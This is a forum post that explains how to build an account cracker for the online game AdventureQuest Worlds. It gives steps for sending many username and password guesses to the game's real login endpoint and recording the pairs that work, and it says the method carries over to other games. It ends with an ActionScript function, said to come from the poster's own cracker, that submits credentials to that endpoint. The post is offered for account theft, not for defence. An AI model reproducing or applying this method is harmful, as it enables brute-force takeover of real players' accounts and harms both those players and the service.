
Originally Posted by
Paggas
How do you make AQW Account Crackers?
1. Choose a programming language.
2. Find the equivalent of a http request in that language.
3. Use this link in the http request -http://game.aqworlds.com/game/cf-userlogin.asp
4. Use these as your post variables in the request (setting them to the different user and pass each time):
5. Use the result of the request (changes depending on the language you use) to determine whether the login was successful or not.
6. If it was successful, record the username and password somewhere.
If you have a little programming knowledge, it is a ridiculously simple task. This method can be used with other games too. You can research bruteforcing.
If you don't know how to code at all - go learn how to code, and then come back
Messy, basic example I pulled up from my cracker
function logCharIn(arg1:String, arg2:String)
{
trace("Trying - " + arg1 + " : " + arg2);
var url:String;
var request:URLRequest;
var requestVars:URLVariables;
url = "http://game.aqworlds.com/game/cf-userlogin.asp";
request = new URLRequest(url);
requestVars = new URLVariables();
requestVars.unm = arg1;
requestVars.pwd = arg2;
request.data = requestVars;
request.method = URLRequestMethod.POST;
urlLoader = new URLLoader();
urlLoader.dataFormat = URLLoaderDataFormat.TEXT;
urlLoader.load(request);
//urlLoader.addEventListener(Even*****MPLETE, onLoginComplete);
//urlLoader.addEventListener(IOErrorEvent****_ERROR, onLoginError);
}